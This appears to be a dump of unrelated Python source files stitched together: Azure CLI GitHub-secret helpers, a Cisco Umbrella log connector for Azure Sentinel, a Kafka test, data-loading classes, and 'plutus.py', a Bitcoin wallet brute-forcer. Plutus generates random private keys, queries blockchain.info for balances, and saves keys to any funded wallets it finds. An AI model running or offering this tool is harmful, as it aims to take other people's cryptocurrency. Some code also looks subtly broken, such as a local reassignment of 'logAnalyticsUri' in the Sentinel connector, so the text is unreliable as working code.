runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
app_runtime_version = '3.1'
app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
from base64 import b64encode
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
__init__.py
|
import requests
import datetime
import logging
import boto3
import gzip
import io
import csv
import time
import os
import sys
import json
import hashlib
import hmac
import base64
from threading import Thread
from io import StringIO
import azure.functions as func
import re
TIME_INTERVAL_MINUTES = 10
DIVIDE_TO_MULTIPLE_TABLES = True
sentinel_customer_id = os.environ.get('WorkspaceID')
sentinel_shared_key = os.environ.get('WorkspaceKey')
sentinel_log_type = 'Cisco_Umbrella'
aws_s3_bucket = os.environ.get('S3Bucket')
aws_access_key_id = os.environ.get('AWSAccessKeyId')
aws_secret_acces_key = os.environ.get('AWSSecretAccessKey')
logAnalyticsUri = os.environ.get('logAnalyticsUri')
if ((logAnalyticsUri in (None, '') or str(logAnalyticsUri).isspace())):
logAnalyticsUri = 'https://' + sentinel_customer_id + '.ods.opinsights.azure.com'
pattern = r'https:\/\/([\w\-]+)\.ods\.opinsights\.azure.([a-zA-Z\.]+)$'
match = re.match(pattern,str(logAnalyticsUri))
if(not match):
raise Exception("Cisco_Umbrella: Invalid Log Analytics Uri.")
def main(mytimer: func.TimerRequest) -> None:
if mytimer.past_due:
logging.info('The timer is past due!')
logging.info('Starting program')
cli = UmbrellaClient(aws_access_key_id, aws_secret_acces_key, aws_s3_bucket)
ts_from, ts_to = cli.get_time_interval()
logging.info('Searching files last modified from {} to {}'.format(ts_from, ts_to))
obj_list = cli.get_files_list(ts_from, ts_to)
logging.info('Total number of files is {}. Total size is {} MB'.format(
len(obj_list),
round(sum([x['Size'] for x in obj_list]) / 10**6, 2)
))
failed_sent_events_number = 0
successfull_sent_events_number = 0
if DIVIDE_TO_MULTIPLE_TABLES:
dns_files = []
proxy_files = []
ip_files = []
cdfw_files = []
for obj in obj_list:
key = obj.get('Key', '')
if 'dnslogs' in key.lower():
dns_files.append(obj)
elif 'proxylogs' in key.lower():
proxy_files.append(obj)
elif 'iplogs' in key.lower():
ip_files.append(obj)
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
cdfw_files.append(obj)
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_dns', queue_size=10000, bulks_number=10)
with sentinel:
for obj in dns_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_proxy', queue_size=10000, bulks_number=10)
with sentinel:
for obj in proxy_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_ip', queue_size=10000, bulks_number=10)
with sentinel:
for obj in ip_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type + '_cloudfirewall', queue_size=10000, bulks_number=10)
with sentinel:
for obj in cdfw_files:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
else:
sentinel = AzureSentinelConnector(sentinel_customer_id, sentinel_shared_key, sentinel_log_type, queue_size=10000, bulks_number=10)
with sentinel:
for obj in obj_list:
cli.process_file(obj, dest=sentinel)
failed_sent_events_number += sentinel.failed_sent_events_number
successfull_sent_events_number += sentinel.successfull_sent_events_number
if failed_sent_events_number:
logging.error('{} events have not been sent'.format(failed_sent_events_number))
logging.info('Program finished. {} events have been sent. {} events have not been sent'.format(successfull_sent_events_number, failed_sent_events_number))
def convert_list_to_csv_line(ls):
line = StringIO()
writer = csv.writer(line)
writer.writerow(ls)
return line.getvalue()
class UmbrellaClient:
def __init__(self, aws_access_key_id, aws_secret_acces_key, aws_s3_bucket):
self.aws_access_key_id = aws_access_key_id
self.aws_secret_acces_key = aws_secret_acces_key
self.aws_s3_bucket = self._get_s3_bucket_name(aws_s3_bucket)
self.aws_s3_prefix = self._get_s3_prefix(aws_s3_bucket)
self.total_events = 0
self.input_date_format = '%Y-%m-%d %H:%M:%S'
self.output_date_format = '%Y-%m-%dT%H:%M:%SZ'
self.s3 = boto3.client(
's3',
aws_access_key_id=self.aws_access_key_id,
aws_secret_access_key=self.aws_secret_acces_key
)
def _get_s3_bucket_name(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
aws_s3_bucket = tokens[0]
return aws_s3_bucket
def _get_s3_prefix(self, aws_s3_bucket):
aws_s3_bucket = self._normalize_aws_s3_bucket_string(aws_s3_bucket)
tokens = aws_s3_bucket.split('/')
if len(tokens) > 1:
prefix = '/'.join(tokens[1:]) + '/'
else:
prefix = ''
return prefix
def _normalize_aws_s3_bucket_string(self, aws_s3_bucket):
aws_s3_bucket = aws_s3_bucket.strip()
aws_s3_bucket = aws_s3_bucket.replace('s3://', '')
if aws_s3_bucket.startswith('/'):
aws_s3_bucket = aws_s3_bucket[1:]
if aws_s3_bucket.endswith('/'):
aws_s3_bucket = aws_s3_bucket[:-1]
return aws_s3_bucket
def get_time_interval(self):
ts_from = datetime.datetime.utcnow() - datetime.timedelta(minutes=TIME_INTERVAL_MINUTES + 1)
ts_to = datetime.datetime.utcnow() - datetime.timedelta(minutes=1)
ts_from = ts_from.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
ts_to = ts_to.replace(tzinfo=datetime.timezone.utc, second=0, microsecond=0)
return ts_from, ts_to
def _make_objects_list_request(self, marker='', prefix=''):
response = self.s3.list_objects(
Bucket=self.aws_s3_bucket,
Marker=marker,
Prefix=prefix
)
try:
response_code = response.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
return response
else:
raise Exception('HTTP Response Code - {}'.format(response_code))
except Exception as err:
logging.error('Error while getting objects list - {}'.format(err))
raise Exception
def get_files_list(self, ts_from, ts_to):
files = []
folders = ['dnslogs', 'proxylogs', 'iplogs', 'cloudfirewalllogs', 'cdfwlogs']
if self.aws_s3_prefix:
folders = [self.aws_s3_prefix + folder for folder in folders]
marker_end = (ts_from - datetime.timedelta(minutes=60)).strftime("/%Y-%m-%d/%Y-%m-%d-%H-%M")
for folder in folders:
marker = folder + marker_end
while True:
response = self._make_objects_list_request(marker=marker, prefix=folder)
for file_obj in response.get('Contents', []):
if ts_to > file_obj['LastModified'] >= ts_from:
files.append(file_obj)
if response['IsTruncated'] is True:
marker = response['Contents'][-1]['Key']
else:
break
return self.sort_files_by_date(files)
def download_obj(self, key):
logging.info('Started downloading {}'.format(key))
res = self.s3.get_object(Bucket=self.aws_s3_bucket, Key=key)
try:
response_code = res.get('ResponseMetadata', {}).get('HTTPStatusCode', None)
if response_code == 200:
body = res['Body']
data = body.read()
logging.info('File {} downloaded'.format(key))
return data
else:
logging.error('Error while getting object {}. HTTP Response Code - {}'.format(key, response_code))
except Exception as err:
logging.error('Error while getting object {} - {}'.format(key, err))
def unpack_file(self, downloaded_obj, key):
try:
file_obj = io.BytesIO(downloaded_obj)
csv_file = gzip.GzipFile(fileobj=file_obj).read().decode()
return csv_file
except Exception as err:
logging.error('Error while unpacking file {} - {}'.format(key, err))
@staticmethod
def convert_empty_string_to_null_values(d: dict):
for k, v in d.items():
if v == '' or (isinstance(v, list) and len(v) == 1 and v[0] == ''):
d[k] = None
return d
@staticmethod
def format_date(date_string, input_format, output_format):
try:
date = datetime.datetime.strptime(date_string, input_format)
date_string = date.strftime(output_format)
except Exception:
pass
return date_string
def parse_csv_ip(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 7:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identity': row[1],
'Source IP': row[2],
'Source Port': row[3],
'Destination IP': row[4],
'Destination Port': row[5],
'Categories': row[6].split(',')
}
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'iplogs'
yield event
def parse_csv_proxy(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 21:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Identities': row[1],
'Internal IP': row[2],
'External IP': row[3],
'Destination IP': row[4],
'Content Type': row[5],
'Verdict': row[6],
'URL': row[7],
'Referer': row[8],
'userAgent': row[9],
'statusCode': row[10],
'requestSize': row[11],
'responseSize': row[12],
'responseBodySize': row[13],
'SHA-SHA256': row[14],
'Categories': row[15].split(','),
'AVDetections': row[16].split(','),
'PUAs': row[17].split(','),
'AMP Disposition': row[18],
'AMP Malware Name': row[19],
'AMP Score': row[20]
}
try:
event['Blocked Categories'] = row[21].split(',')
except IndexError:
pass
int_fields = [
'requestSize',
'responseSize',
'responseBodySize'
]
for field in int_fields:
try:
event[field] = int(event[field])
except Exception:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'proxylogs'
yield event
def parse_csv_dns(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 10:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'Policy Identity': row[1],
'Identities': row[2].split(','),
'InternalIp': row[3],
'ExternalIp': row[4],
'Action': row[5],
'QueryType': row[6],
'ResponseCode': row[7],
'Domain': row[8],
'Categories': row[9].split(',')
}
try:
event['Policy Identity Type'] = row[10]
except IndexError:
pass
try:
event['Identity Types'] = row[11].split(',')
except IndexError:
pass
try:
event['Blocked Categories'] = row[12].split(',')
except IndexError:
pass
else:
event = {"message": convert_list_to_csv_line(row)}
event = self.convert_empty_string_to_null_values(event)
event['EventType'] = 'dnslogs'
yield event
def parse_csv_cdfw(self, csv_file):
csv_reader = csv.reader(csv_file.split('\n'), delimiter=',')
for row in csv_reader:
if len(row) > 1:
if len(row) >= 14:
event = {
'Timestamp': self.format_date(row[0], self.input_date_format, self.output_date_format),
'originId': row[1],
'Identity': row[2],
'Identity Type': row[3],
'Direction': row[4],
'ipProtocol': row[5],
'packetSize': row[6],
'sourceIp': row[7],
'sourcePort': row[8],
'destinationIp': row[9],
'destinationPort': row[10],
'dataCenter': row[11],
'ruleId': row[12],
'verdict': row[13]
}
else:
event = {"message": convert_list_to_csv_line(row)}
event['EventType'] = 'cloudfirewalllogs'
yield event
@staticmethod
def sort_files_by_date(ls):
return sorted(ls, key=lambda k: k['LastModified'])
def process_file(self, obj, dest):
t0 = time.time()
key = obj['Key']
if 'csv.gz' in key.lower():
downloaded_obj = self.download_obj(key)
csv_file = self.unpack_file(downloaded_obj, key)
parser_func = None
if 'dnslogs' in key.lower():
parser_func = self.parse_csv_dns
elif 'proxylogs' in key.lower():
parser_func = self.parse_csv_proxy
elif 'iplogs' in key.lower():
parser_func = self.parse_csv_ip
elif 'cloudfirewalllogs' in key.lower() or 'cdfwlogs' in key.lower():
parser_func = self.parse_csv_cdfw
if parser_func:
file_events = 0
for event in parser_func(csv_file):
dest.send(event)
file_events += 1
self.total_events += 1
logging.info('File processed | TIME {} sec | SIZE {} MB | Events {} | Key {}'.format(round(time.time() - t0, 2), round(obj['Size'] / 10**6, 2), file_events, key))
class AzureSentinelConnector:
def __init__(self, customer_id, shared_key, log_type, queue_size=200, bulks_number=10, queue_size_bytes=25 * (2**20)):
self.customer_id = customer_id
self.shared_key = shared_key
self.log_type = log_type
self.queue_size = queue_size
self.bulks_number = bulks_number
self.queue_size_bytes = queue_size_bytes
self._queue = []
self._bulks_list = []
self.successfull_sent_events_number = 0
self.failed_sent_events_number = 0
def send(self, event):
self._queue.append(event)
if len(self._queue) >= self.queue_size:
self.flush(force=False)
def flush(self, force=True):
self._bulks_list.append(self._queue)
if force:
self._flush_bulks()
else:
if len(self._bulks_list) >= self.bulks_number:
self._flush_bulks()
self._queue = []
def _flush_bulks(self):
jobs = []
for queue in self._bulks_list:
if queue:
queue_list = self._split_big_request(queue)
for q in queue_list:
jobs.append(Thread(target=self._post_data, args=(self.customer_id, self.shared_key, q, self.log_type, )))
for job in jobs:
job.start()
for job in jobs:
job.join()
self._bulks_list = []
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
self.flush()
def _build_signature(self, customer_id, shared_key, date, content_length, method, content_type, resource):
x_headers = 'x-ms-date:' + date
string_to_hash = method + "\n" + str(content_length) + "\n" + content_type + "\n" + x_headers + "\n" + resource
bytes_to_hash = bytes(string_to_hash, encoding="utf-8")
decoded_key = base64.b64decode(shared_key)
encoded_hash = base64.b64encode(hmac.new(decoded_key, bytes_to_hash, digestmod=hashlib.sha256).digest()).decode()
authorization = "SharedKey {}:{}".format(customer_id, encoded_hash)
return authorization
def _post_data(self, customer_id, shared_key, body, log_type):
events_number = len(body)
body = json.dumps(body)
method = 'POST'
content_type = 'application/json'
resource = '/api/logs'
rfc1123date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
content_length = len(body)
signature = self._build_signature(customer_id, shared_key, rfc1123date, content_length, method, content_type, resource)
logAnalyticsUri = logAnalyticsUri + resource + '?api-version=2016-04-01'
headers = {
'content-type': content_type,
'Authorization': signature,
'Log-Type': log_type,
'x-ms-date': rfc1123date
}
response = requests.post(logAnalyticsUri, data=body, headers=headers)
if (response.status_code >= 200 and response.status_code <= 299):
logging.info('{} events have been successfully sent to Azure Sentinel'.format(events_number))
self.successfull_sent_events_number += events_number
else:
logging.error("Error during sending events to Azure Sentinel. Response code: {}".format(response.status_code))
self.failed_sent_events_number += events_number
def _check_size(self, queue):
data_bytes_len = len(json.dumps(queue).encode())
return data_bytes_len < self.queue_size_bytes
def _split_big_request(self, queue):
if self._check_size(queue):
return [queue]
else:
middle = int(len(queue) / 2)
queues_list = [queue[:middle], queue[middle:]]
return self._split_big_request(queues_list[0]) + self._split_big_request(queues_list[1])
|
data_runner.py
|
import multiprocessing
class DataRunnerMP:
"""
A multi-processing data runner for tensorflow
"""
def __init__(self, task_func, task_generator, capacity=100):
self._task_func = task_func
self._task_generator = task_generator
self.counter = 0
self.processes = []
self.capacity = capacity
def get_feed_blobs(self):
if self.counter % 100 == 0:
print('qlen=%i' % self.data_queue.qsize())
self.counter += 1
blobs = self.data_queue.get()
return blobs
def _worker_main(self, task_queue, data_queue):
"""
generate sample from task queue and put the sample
into a data queue in the form of tf feed_dict
"""
while True:
task = task_queue.get()
sample = self._task_func(task)
if sample is None:
continue
data_queue.put(sample)
def _manager_main(self, queue):
"""
put tasks into queue
"""
for task in self._task_generator():
queue.put(task)
def start_processes(self, sess, n_processes=1):
self.task_queue = multiprocessing.Queue(self.capacity)
self.data_queue = multiprocessing.Queue(self.capacity)
p = multiprocessing.Process(target=self._manager_main, args=(self.task_queue,))
p.daemon = True
p.start()
self.processes.append(p)
for n in range(n_processes):
p = multiprocessing.Process(target=self._worker_main, args=(self.task_queue, self.data_queue))
p.daemon = True
p.start()
self.processes.append(p)
|
test_threads.py
|
#!/usr/bin/env python
from confluent_kafka import Producer
import threading
import time
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
class IntendedException (Exception):
pass
def thread_run(myid, p, q):
def do_crash(err, msg):
raise IntendedException()
for i in range(1, 3):
cb = None
if i == 2:
cb = do_crash
p.produce('mytopic', value='hi', callback=cb)
t = time.time()
try:
p.flush()
print(myid, 'Flush took %.3f' % (time.time() - t))
except IntendedException:
print(myid, "Intentional callback crash: ok")
continue
print(myid, 'Done')
q.put(myid)
def test_thread_safety():
""" Basic thread safety tests. """
q = Queue()
p = Producer({'socket.timeout.ms': 10,
'message.timeout.ms': 10})
threads = list()
for i in range(1, 5):
thr = threading.Thread(target=thread_run, name=str(i), args=[i, p, q])
thr.start()
threads.append(thr)
for thr in threads:
thr.join()
# Count the number of threads that exited cleanly
cnt = 0
try:
for x in iter(q.get_nowait, None):
cnt += 1
except Empty:
pass
if cnt != len(threads):
raise Exception('Only %d/%d threads succeeded' % (cnt, len(threads)))
print('Done')
if __name__ == '__main__':
test_thread_safety()
|
plutus.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Donate: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa; if you can Donate also here : 1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7
import requests
import os
import binascii
import ecdsa
import hashlib
import base58
import time
import sys
from multiprocessing import Process, Queue
class pause: # Counts API failures for timeout
p = 0
def privateKey(): # Generates random 256 bit private key in hex format
return binascii.hexlify(os.urandom(32)).decode('utf-8')
def publicKey(privatekey): # Private Key -> Public Key
privatekey = binascii.unhexlify(privatekey)
s = ecdsa.SigningKey.from_string(privatekey, curve = ecdsa.SECP256k1)
return '04' + binascii.hexlify(s.verifying_key.to_string()).decode('utf-8')
def address(publickey): # Public Key -> Wallet Address
alphabet = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
c = '0'; byte = '00'; zero = 0
var = hashlib.new('ripemd160')
var.update(hashlib.sha256(binascii.unhexlify(publickey.encode())).digest())
a = (byte + var.hexdigest())
doublehash = hashlib.sha256(hashlib.sha256(binascii.unhexlify(a.encode())).digest()).hexdigest()
address = a + doublehash[0:8]
for char in address:
if (char != c):
break
zero += 1
zero = zero // 2
n = int(address, 16)
output = []
while (n > 0):
n, remainder = divmod (n, 58)
output.append(alphabet[remainder])
count = 0
while (count < zero):
output.append(alphabet[0])
count += 1
return ''.join(output[::-1])
def balance(address): # Query API for wallet balance
try:
API = requests.get("https://blockchain.info/q/addressbalance/" + str(address) + "/balance")
if (API.status_code == 429):
pause.p += 1
if (pause.p >= 10):
print ("\nUnable to connect to API after several attempts\nRetrying in 30 seconds\n")
time.sleep(30)
pause.p = 0
return -1
print("\nHTTP Error Code: " + str(API.status_code) + "\n")
return -1
if (API.status_code != 200 and API.status_code != 400):
print("\nHTTP Error Code: " + str(API.status_code) + "\nRetrying in 5 seconds\n")
time.sleep(5)
return -1
balance = int(API.text)
pause.p = 0
return balance
except:
pause.p += 1
if (pause.p >= 10):
print ("\nUnable to connect to API after several attempts\nRetrying in 30 seconds\n")
time.sleep(30)
pause.p = 0
return -1
def toWIF(privatekey): # Hex Private Key -> WIF format
var80 = "80" + str(privatekey)
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify(var80)).hexdigest())).hexdigest()
return str(base58.b58encode(binascii.unhexlify(str(var80) + str(var[0:8]))))
def Plutus(): # Main Plutus Function
data = [0,0,0,0]
while True:
data[0] = privateKey()
data[1] = publicKey(data[0])
data[2] = address(data[1])
data[3] = balance(data[2])
if (data[3] == -1):
continue
if (data[3] == 0):
print("{:<34}".format(str(data[2])) + " = " + str(data[3]))
if (data[3] > 0):
print ("\naddress: " + str(data[2]) + "\n" +
"private key: " + str(data[0]) + "\n" +
"WIF private key: " + str(toWIF(str(data[0]))) + "\n" +
"public key: " + str(data[1]).upper() + "\n" +
"balance: " + str(data[3]) + "\n")
file = open("plutus.txt","a")
file.write("address: " + str(data[2]) + "\n" +
"private key: " + str(data[0]) + "\n" +
"WIF private key: " + str(toWIF(str(data[0]))) + "\n" +
"public key: " + str(data[1]).upper() + "\n" +
"balance: " + str(data[3]) + "\n" +
"Donate to the author of this program: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa;1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7\n\n")
file.close()
### Multiprocessing Extension Made By Wayne Yao https://github.com/wx-Yao ###
def put_dataset(queue):
while True:
if queue.qsize() > 100:
time.sleep(10)
else:
privatekey = privateKey()
publickey = publicKey(privatekey)
Address = address(publickey)
WIF = toWIF(privatekey)
dataset = (Address, privatekey, publickey, WIF)
queue.put(dataset, block = False)
return None
def worker(queue):
time.sleep(1)
while True:
if queue.qsize() > 0:
dataset = queue.get(block = True)
balan = balance(dataset[0])
process_balance(dataset, balan)
else:
time.sleep(3)
return None
def process_balance(dataset,balance):
if balance == -1 :
return None
elif balance == 0 :
print("{:<34}".format(str(dataset[0])) + " = " + str(balance))
return None
else:
addr = dataset[0]
privatekey = dataset[1]
publickey = dataset[2]
WIF = dataset[3]
file = open("plutus.txt","a")
file.write("address: " + str(addr) + "\n" +
"private key: " + str(privatekey) + "\n" +
"WIF private key: " + str(WIF) + "\n" +
"public key: " + str(publickey).upper() + "\n" +
"balance: " + str(balance) + "\n" +
"Donate to the author of this program: 1B1k2fMs6kEmpxdYor6qvd2MRVUX2zGEHa;1TakawJC9DKG3cdFT7LazDrfvXvYpSKV7\n\n")
file.close()
return None
def multi():
processes = []
dataset = Queue()
datasetProducer = Process(target = put_dataset, args = (dataset,))
datasetProducer.daemon = True
processes.append(datasetProducer)
datasetProducer.start()
for core in range(4):
work = Process(target = worker, args = (dataset,))
work.deamon = True
processes.append(work)
work.start()
try:
datasetProducer.join()
except KeyboardInterrupt:
for process in processes:
process.terminate()
print('\n\n------------------------\nALL PROCESSES TERMINATED\n')
### End of Multiprocessing Extension ###
def main():
if ("-m" in sys.argv):
print("\n-------- MULTIPROCESSING MODE ACTIVATED --------\n")
time.sleep(3)
print("\n|-------- Wallet Address --------| = Balance in Satoshi")
multi()
else:
print("\n|-------- Wallet Address --------| = Balance in Satoshi")
Plutus()
if __name__ == '__main__':
main()
|
dataset.py
|
"""Data fetching with pandas
"""
# MIT License
#
# Copyright (c) 2018 Yichun Shi
# Copyright (c) 2021 Kaen Chan
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import os
import time
import math
import random
import shutil
from functools import wraps
from multiprocessing import Process, Queue
import numpy as np
import pandas as pd
queue_timeout = 600
class Dataset(object):
def __init__(self, path=None, prefix=None):
if path is not None:
self.init_from_path(path)
else:
# self.data = pd.DataFrame([], columns=['path', 'abspath', 'label', 'name'])
self.data = pd.DataFrame([], columns=['abspath', 'label'])
self.prefix = prefix
self.base_seed = 0
self.batch_queue = None
self.batch_workers = None
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
return self.data[key]
def _delitem(self, key):
self.data.__delitem__(key)
@property
def num_classes(self):
return len(self.data['label'].unique())
@property
def classes(self):
return self.data['label'].unique()
@property
def size(self):
return self.data.shape[0]
@property
def loc(self):
return self.data.loc
@property
def iloc(self):
return self.data.iloc
def init_from_path(self, path):
if type(path) == list:
self.init_from_folders(path)
return
path = os.path.expanduser(path)
_, ext = os.path.splitext(path)
if os.path.isdir(path):
self.init_from_folder(path)
elif ext == '.txt':
self.init_from_list(path)
else:
raise ValueError('Cannot initialize dataset from path: %s\n\
It should be either a folder, .txt or .hdf5 file' % path)
# print('%d images of %d classes loaded' % (len(self.images), self.num_classes))
def init_from_folder(self, folder):
folder = os.path.abspath(os.path.expanduser(folder))
class_names = os.listdir(folder)
class_names.sort()
class_names = class_names[:20000]
print('num_classes', len(class_names))
paths = []
labels = []
names = []
for label, class_name in enumerate(class_names):
classdir = os.path.join(folder, class_name)
if os.path.isdir(classdir):
images_class = os.listdir(classdir)
images_class.sort()
images_class = [os.path.join(class_name,img) for img in images_class]
paths.extend(images_class)
labels.extend(len(images_class) * [label])
names.extend(len(images_class) * [class_name])
abspaths = [os.path.join(folder,p) for p in paths]
# self.data = pd.DataFrame({'path': paths, 'abspath': abspaths, 'label': labels, 'name': names})
self.data = pd.DataFrame({'abspath': abspaths, 'label': labels})
print('num_images', len(names))
self.prefix = folder
def init_from_folders(self, folders):
class_names_all = []
labels_all = []
abspaths_all = []
for folder in folders:
